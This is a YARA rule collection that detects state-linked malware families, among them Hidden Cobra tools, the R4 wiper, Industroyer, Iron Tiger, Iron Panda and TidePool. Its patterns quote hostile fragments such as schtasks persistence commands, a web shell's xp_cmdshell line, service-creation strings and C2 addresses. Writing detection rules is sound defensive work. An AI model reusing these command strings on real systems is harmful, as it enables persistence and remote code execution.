{8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3} $s4 = {B91A7900008A140780F29A8810404975F4} $s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F} $s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3} $s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC} $s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24} $s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523} $s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0} $s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7} $s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541} $s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05} condition: any of them } rule NK_SSL_PROXY{ meta: Author = "US-CERT Code Analysis Team" Date = "2018/01/09" MD5_1 = "C6F78AD187C365D117CACBEE140F6230" MD5_2 = "C01DC42F65ACAF1C917C0CC29BA63ADC" Info= "Detects NK SSL PROXY" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = {8B4C24088A140880F24780C228881408403BC67CEF5E} $s1 = {568B74240C33C085F67E158B4C24088A140880EA2880F247881408403BC67CEF5E} $s2 = {4775401F713435747975366867766869375E2524736466} $s3 = {67686667686A75797566676467667472} $s4 = {6D2A5E265E676866676534776572} $s5 = {3171617A5853444332337765} $s6 = "ghfghjuyufgdgftr" $s7 = "q45tyu6hgvhi7^%$sdf" $s8 = "m*^&^ghfge4wer" condition: ($s0 and $s1 and $s2 and $s3 and $s4 and $s5) or ($s6 and $s7 and $s8) } rule r4_wiper_1 { meta: source = "NCCIC Partner" date = "2017-12-12" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 
7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 } $controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 } condition: uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and any of them } rule r4_wiper_2 { meta: source = "NCCIC Partner" date = "2017-12-12" report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: // BIOS Extended Write $PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide $ExtendedWrite = { B4 43 B0 00 CD 13 } condition: uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule APT_Hikit_msrv { meta: author = "ThreatConnect Intelligence Research Team" strings: $m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C} condition: any of them } /* Yara Rule Set Author: Florian Roth Date: 2017-06-13 Identifier: Industroyer Reference: https://goo.gl/x81cSy */ /* Rule Set ----------------------------------------------------------------- */ rule Industroyer_Malware_1 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910" hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81" strings: $s1 = "haslo.exe" fullword ascii $s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide $s3 = "SYS_BASCON.COM" fullword wide $s4 = "*.pcmt" fullword wide $s5 = "*.pcmi" fullword wide $x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43 00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45 00 3A 00 5C 00 00 00 } $x2 = "haslo.dat\x00Crash" condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of ($x*) or 2 of them ) } rule Industroyer_Malware_2 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571" hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4" hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77" hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47" strings: $x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide $x2 = "10.15.1.69:3128" fullword wide $s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide $s2 = "/c sc stop %s" fullword wide $s3 = "sc start %ls" fullword 
wide $s4 = "93.115.27.57" fullword wide $s5 = "5.39.218.152" fullword wide $s6 = "tierexe" fullword wide $s7 = "comsys" fullword wide $s8 = "195.16.88.6" fullword wide $s9 = "TieringService" fullword wide $a1 = "TEMP\x00\x00DEF" fullword wide $a2 = "TEMP\x00\x00DEF-C" fullword wide $a3 = "TEMP\x00\x00DEF-WS" fullword wide $a4 = "TEMP\x00\x00DEF-EP" fullword wide $a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide $a6 = "TEMP\x00\x00DC-2" fullword wide $a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide $a8 = "TEMP\x00\x00SRV_WSUS" fullword wide $a9 = "TEMP\x00\x00SRV_DC-2" fullword wide $a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) or 3 of them or 1 of ($a*) ) or ( 5 of them ) } rule Industroyer_Portscan_3 { meta: description = "Detects Industroyer related custom port scaner" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f" strings: $s1 = "!ZBfamily" fullword ascii $s2 = ":g/outddomo;" fullword ascii $s3 = "GHIJKLMNOTST" fullword ascii /* Decompressed File */ $d1 = "Error params Arguments!!!" fullword wide $d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide $d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide $d4 = "Error IP Range %ls - %ls" fullword wide $d5 = "Can't closesocket." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of ($s*) or 2 of ($d*) ) } rule Industroyer_Portscan_3_Output { meta: description = "Detects Industroyer related custom port scaner output file" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" strings: $s1 = "WSA library load complite." 
fullword ascii $s2 = "Connection refused" fullword ascii condition: all of them } rule Industroyer_Malware_4 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561" strings: $s1 = "haslo.dat" fullword wide $s2 = "defragsvc" fullword ascii /* .dat\x00\x00Crash */ $a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of ($s*) or $a1 ) } rule Industroyer_Malware_5 { meta: description = "Detects Industroyer related malware" author = "Florian Roth" reference = "https://goo.gl/x81cSy" date = "2017-06-13" hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad" strings: $x1 = "D2MultiCommService.exe" fullword ascii $x2 = "Crash104.dll" fullword ascii $x3 = "iec104.log" fullword ascii $x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii $s1 = "Error while getaddrinfo executing: %d" fullword ascii $s2 = "return info-Remote command" fullword ascii $s3 = "Error killing process ..." fullword ascii $s4 = "stop_comm_service_name" fullword ascii $s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and ( 1 of ($x*) or 4 of them ) ) or ( all of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule IronTiger_ASPXSpy { meta: author = "Cyber Safety Solutions, Trend Micro" description = "ASPXSpy detection. 
It might be used by other fraudsters" reference = "http://goo.gl/T5fSJC" strings: $str1 = "ASPXSpy" nocase wide ascii $str2 = "IIS Spy" nocase wide ascii $str3 = "protected void DGCoW(object sender,EventArgs e)" nocase wide ascii condition: any of ($str*) } rule IronTiger_ChangePort_Toolkit_driversinstall { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - Changeport Toolkit driverinstall" reference = "http://goo.gl/T5fSJC" strings: $str1 = "openmydoor" nocase wide ascii $str2 = "Install service error" nocase wide ascii $str3 = "start remove service" nocase wide ascii $str4 = "NdisVersion" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_ChangePort_Toolkit_ChangePortExe { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - Toolkit ChangePort" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Unable to alloc the adapter!" nocase wide ascii $str2 = "Wait for master fuck" nocase wide ascii $str3 = "xx.exe <HOST> <PORT>" nocase wide ascii $str4 = "chkroot2007" nocase wide ascii $str5 = "Door is bind on %s" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_dllshellexc2010 { meta: author = "Cyber Safety Solutions, Trend Micro" description = "dllshellexc2010 Exchange backdoor + remote shell" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Microsoft.Exchange.Clients.Auth.dll" nocase ascii wide $str2 = "Dllshellexc2010" nocase wide ascii $str3 = "Users\\ljw\\Documents" nocase wide ascii $bla1 = "please input path" nocase wide ascii $bla2 = "auth.owa" nocase wide ascii condition: (uint16(0) == 0x5a4d) and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_dnstunnel { meta: author = "Cyber Safety Solutions, Trend Micro" description = "This rule detects a dns tunnel tool used in Operation Iron Tiger" reference = "http://goo.gl/T5fSJC" strings: $str1 = "\\DnsTunClient\\" nocase wide ascii $str2 = "\\t-DNSTunnel\\" nocase 
wide ascii $str3 = "xssok.blogspot" nocase wide ascii $str4 = "dnstunclient" nocase wide ascii $mistake1 = "because of error, can not analysis" nocase wide ascii $mistake2 = "can not deal witn the error" nocase wide ascii $mistake3 = "the other retun one RST" nocase wide ascii $mistake4 = "Coversation produce one error" nocase wide ascii $mistake5 = "Program try to use the have deleted the buffer" nocase wide ascii condition: (uint16(0) == 0x5a4d) and ((any of ($str*)) or (any of ($mistake*))) } rule IronTiger_EFH3_encoder { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger EFH3 Encoder" reference = "http://goo.gl/T5fSJC" strings: $str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" nocase wide ascii $str2 = "123.EXE 123.EFH" nocase wide ascii $str3 = "ENCODER: b[i]: = " nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_GetPassword_x64 { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GetPassword x64" reference = "http://goo.gl/T5fSJC" strings: $str1 = "(LUID ERROR)" nocase wide ascii $str2 = "Users\\K8team\\Desktop\\GetPassword" nocase wide ascii $str3 = "Debug x64\\GetPassword.pdb" nocase wide ascii $bla1 = "Authentication Package:" nocase wide ascii $bla2 = "Authentication Domain:" nocase wide ascii $bla3 = "* Password:" nocase wide ascii $bla4 = "Primary User:" nocase wide ascii condition: uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_GetUserInfo { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GetUserInfo" reference = "http://goo.gl/T5fSJC" strings: $str1 = "getuserinfo username" nocase wide ascii $str2 = "joe@joeware.net" nocase wide ascii $str3 = "If . 
specified for userid," nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_Gh0stRAT_variant { meta: author = "Cyber Safety Solutions, Trend Micro" description = "This is a detection for a s.exe variant seen in Op. Iron Tiger" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Game Over Good Luck By Wind" nocase wide ascii $str2 = "ReleiceName" nocase wide ascii $str3 = "jingtisanmenxiachuanxiao.vbs" nocase wide ascii $str4 = "Winds Update" nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_GTalk_Trojan { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GTalk Trojan" reference = "http://goo.gl/T5fSJC" strings: $str1 = "gtalklite.com" nocase wide ascii $str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" nocase wide ascii $str3 = "D13idmAdm" nocase wide ascii $str4 = "Error: PeekNamedPipe failed with %i" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_HTTPBrowser_Dropper { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - HTTPBrowser Dropper" reference = "http://goo.gl/T5fSJC" strings: $str1 = ".dllUT" nocase wide ascii $str2 = ".exeUT" nocase wide ascii $str3 = ".urlUT" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_HTTP_SOCKS_Proxy_soexe { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe" reference = "http://goo.gl/T5fSJC" strings: $str1 = "listen SOCKET error." nocase wide ascii $str2 = "WSAAsyncSelect SOCKET error." nocase wide ascii $str3 = "new SOCKETINFO error!" nocase wide ascii $str4 = "Http/1.1 403 Forbidden" nocase wide ascii $str5 = "Create SOCKET error." 
nocase wide ascii condition: uint16(0) == 0x5a4d and (3 of ($str*)) } rule IronTiger_NBDDos_Gh0stvariant_dropper { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper" reference = "http://goo.gl/T5fSJC" strings: $str1 = "This service can't be stoped." nocase wide ascii $str2 = "Provides support for media palyer" nocase wide ascii $str4 = "CreaetProcess Error" nocase wide ascii $bla1 = "Kill You" nocase wide ascii $bla2 = "%4.2f GB" nocase wide ascii condition: uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_PlugX_DosEmulator { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX DosEmulator" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Dos Emluator Ver" nocase wide ascii $str2 = "\\PIPE\\FASTDOS" nocase wide ascii $str3 = "FastDos.cpp" nocase wide ascii $str4 = "fail,error code = %d." nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_PlugX_FastProxy { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX FastProxy" reference = "http://goo.gl/T5fSJC" strings: $str1 = "SAFEPROXY HTServerTimer Quit!" nocase wide ascii $str2 = "Useage: %s pid" nocase wide ascii $str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" nocase wide ascii $str4 = "p0: port for listener" nocase wide ascii $str5 = "\\users\\whg\\desktop\\plug\\" nocase wide ascii $str6 = "[+Y] cwnd : %3d, fligth:" nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_PlugX_Server { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX Server" reference = "http://goo.gl/T5fSJC" strings: $str1 = "\\UnitFrmManagerKeyLog.pas" nocase wide ascii $str2 = "\\UnitFrmManagerRegister.pas" nocase wide ascii $str3 = "Input Name..." nocase wide ascii $str4 = "New Value#" nocase wide ascii $str5 = "TThreadRControl.Execute SEH!!!" 
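nocase wide ascii
        $str6 = "\\UnitFrmRControl.pas" nocase wide ascii
        $str7 = "OnSocket(event is error)!" nocase wide ascii
        $str8 = "Make 3F Version Ok!!!" nocase wide ascii
        $str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" nocase wide ascii
        $str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" nocase wide ascii
    condition:
        // MZ header plus any two of the strings.
        uint16(0) == 0x5a4d and (2 of ($str*))
}

// Iron Tiger "ReadPWD86": the strings reference LSASRV/LSASS, consistent with
// a tool that reads credentials out of lsass memory (the description is the
// source for that attribution, not the rule itself).
rule IronTiger_ReadPWD86
{
    meta:
        author = "Cyber Safety Solutions, Trend Micro"
        description = "Iron Tiger Malware - ReadPWD86"
        reference = "http://goo.gl/T5fSJC"
    strings:
        $str1 = "Fail To Load LSASRV" nocase wide ascii
        $str2 = "Fail To Search LSASS Data" nocase wide ascii
        $str3 = "User Principal" nocase wide ascii
    condition:
        // PE (MZ) header and all three strings.
        uint16(0) == 0x5a4d and (all of ($str*))
}

// Iron Tiger Gh0st RAT variant ("Ring").
// NOTE(review): the $bla branch ("Sucess!" + "user canceled!", case-insensitive)
// is generic enough to hit benign software; treat hits that satisfy only that
// branch as low confidence. $str3 is absent in the upstream rule (kept as-is).
rule IronTiger_Ring_Gh0stvariant
{
    meta:
        author = "Cyber Safety Solutions, Trend Micro"
        description = "Iron Tiger Malware - Ring Gh0stvariant"
        reference = "http://goo.gl/T5fSJC"
    strings:
        $str1 = "RING RAT Exception" nocase wide ascii
        $str2 = "(can not update server recently)!" nocase wide ascii
        $str4 = "CreaetProcess Error" nocase wide ascii
        $bla1 = "Sucess!" nocase wide ascii
        $bla2 = "user canceled!" nocase wide ascii
    condition:
        uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*)))
}

// Iron Tiger wmiexec (wmi.vbs): a script, so there is deliberately no
// file-header check; two of the help/usage strings are enough.
rule IronTiger_wmiexec
{
    meta:
        author = "Cyber Safety Solutions, Trend Micro"
        description = "Iron Tiger Tool - wmi.vbs detection"
        reference = "http://goo.gl/T5fSJC"
    strings:
        $str1 = "Temp Result File , Change it to where you like" nocase wide ascii
        $str2 = "wmiexec" nocase wide ascii
        $str3 = "By. Twi1ight" nocase wide ascii
        $str4 = "[both mode] ,delay TIME to read result" nocase wide ascii
        $str5 = "such as nc.exe or Trojan" nocase wide ascii
        $str6 = "+++shell mode+++" nocase wide ascii
        $str7 = "win2008 fso has no privilege to delete file" nocase wide ascii
    condition:
        2 of ($str*)
}

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2015-09-16
    Identifier: Iron Panda
*/

/* Rule Set ----------------------------------------------------------------- */

// Iron Panda DNS tunnelling client (named.exe). $s3/$s4 are the schtasks
// persistence command lines; $s6 is the PDB/source path.
rule IronPanda_DNSTunClient
{
    meta:
        description = "Iron Panda malware DnsTunClient - file named.exe"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        score = 80
        hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
    strings:
        $s1 = "dnstunclient -d or -domain <domain>" fullword ascii
        $s2 = "dnstunclient -ip <server ip address>" fullword ascii
        $s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
        $s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
        $s5 = "taskkill /im conime.exe" fullword ascii
        $s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" fullword ascii
        $s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
        $s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
        $s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
        $s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
        $s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
    condition:
        // Small PE with two strings, or five strings in anything (memory, dumps).
        ( uint16(0) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them
}

// Iron Panda .NET component wrapping activedsimp.dll; the $s* names are ADSI
// (IADsUser) property accessors, suggesting AD account enumeration — verify
// against the sample before relying on that reading.
rule IronPanda_Malware1
{
    meta:
        description = "Iron Panda Malware"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
    strings:
        $x1 = "activedsimp.dll" fullword wide
        $s1 = "get_BadLoginAddress" fullword ascii
        $s2 = "get_LastFailedLogin" fullword ascii
        $s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
        $s4 = "get_PasswordExpirationDate" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

// Iron Panda web shell. $s1 runs xp_cmdshell/bcp through the database, i.e.
// OS command execution via SQL Server.
// NOTE(review): despite the rule name, the strings (Bin_PostBack, .Text=,
// ToString()) look like ASP.NET/C# rather than JSP — confirm against the hash
// before using the name for triage.
rule IronPanda_Webshell_JSP
{
    meta:
        description = "Iron Panda Malware JSP"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
    strings:
        $s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
        $s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
        $s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
    condition:
        // Script file: no header check, any one of the very specific strings.
        filesize < 330KB and 1 of them
}

// HTran-style port forwarder (listen / tran / slave modes).
// NOTE(review): $s10 is contained in $s11 and "_" is not alphanumeric, so
// fullword does not separate them — a file holding $s11 counts both, which
// lowers the effective "3 of" / "5 of" thresholds by one.
rule IronPanda_Malware_Htran
{
    meta:
        description = "Iron Panda Malware Htran"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
    strings:
        $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
        $s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
        $s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s4 = "[-] ERROR: Must supply logfile name." fullword ascii
        $s5 = "[SERVER]connection to %s:%d error" fullword ascii
        $s6 = "[+] Make a Connection to %s:%d...." fullword ascii
        $s7 = "[+] Waiting another Client on port:%d...." fullword ascii
        $s8 = "[+] Accept a Client on port %d from %s" fullword ascii
        $s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
        $s10 = "cmshared_get_ptr_from_atom" fullword ascii
        $s11 = "_cmshared_get_ptr_from_atom" fullword ascii
        $s12 = "[+] OK! I Closed The Two Socket." fullword ascii
        $s13 = "[-] TransmitPort invalid." fullword ascii
        $s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them
}

// Iron Panda dropper: embedded setup.exe / msi.dll (the "UT" suffixes are
// archive entry names) and a self-delete command line.
rule IronPanda_Malware2
{
    meta:
        description = "Iron Panda Malware"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
    strings:
        $s0 = "\\setup.exe" fullword ascii
        $s1 = "msi.dll.urlUT" fullword ascii
        $s2 = "msi.dllUT" fullword ascii
        $s3 = "setup.exeUT" fullword ascii
        $s4 = "/c del /q %s" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 180KB and all of them
}

// Iron Panda PluginDeflater (tiny .NET helper). $s3-$s5 occur in goodware too,
// hence the strict "all of them" plus the 10KB size cap.
rule IronPanda_Malware3
{
    meta:
        description = "Iron Panda Malware"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
    strings:
        $s0 = "PluginDeflater.exe" fullword wide
        $s1 = ".Deflated" fullword wide
        $s2 = "PluginDeflater" fullword ascii
        $s3 = "DeflateStream" fullword ascii /* Goodware String - occured 1 times */
        $s4 = "CompressionMode" fullword ascii /* Goodware String - occured 4 times */
        $s5 = "System.IO.Compression" fullword ascii /* Goodware String - occured 6 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 10KB and all of them
}

// Iron Panda AspxSpy test plugin (.NET). String numbering gap ($s3-$s5) is
// inherited from the upstream rule.
rule IronPanda_Malware4
{
    meta:
        description = "Iron Panda Malware"
        author = "Florian Roth"
        reference = "https://goo.gl/E4qia9"
        date = "2015-09-16"
        hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
    strings:
        $s0 = "TestPlugin.dll" fullword wide
        $s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
        $s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
        $s6 = "TestPlugin" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 10KB and all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// APT.Kaba RTF documents authored as "John Doe" / "author Stone".
// FIX: the upstream condition read "$magic1 or $magic2 or $magic3 at 0", which
// YARA parses as "$magic1 or $magic2 or ($magic3 at 0)" — only the third magic
// was anchored to offset 0. All three header variants are now anchored, which
// is what the hex comments ({\rt01, {\rtf1, {\rtxa3) clearly intend.
rule rtf_Kaba_jDoe
{
    meta:
        author = "@patrickrolsen"
        maltype = "APT.Kaba"
        filetype = "RTF"
        version = "0.1"
        description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
        date = "2013-12-10"
    strings:
        $magic1 = { 7b 5c 72 74 30 31 } // {\rt01
        $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
        $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
        $author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
        $author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
        $string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
    condition:
        ($magic1 at 0 or $magic2 at 0 or $magic3 at 0) and all of ($author*) and $string1
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.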
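*/

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2016-05-24
    Identifier: TidePool (Ke3chang)
*/

/* APTKe3chang */

// TidePool (Ke3chang): multipart/form-data C2 upload and an "IEHelper" mshtml.dll
// masquerade path. Upstream listed hash1 twice (as hash5); the duplicate is dropped.
rule TidePool_Malware
{
    meta:
        description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
        author = "Florian Roth"
        reference = "http://goo.gl/m2CXWR"
        date = "2016-05-24"
        hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
        hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
        hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
        hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
    strings:
        $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
        $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
        $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
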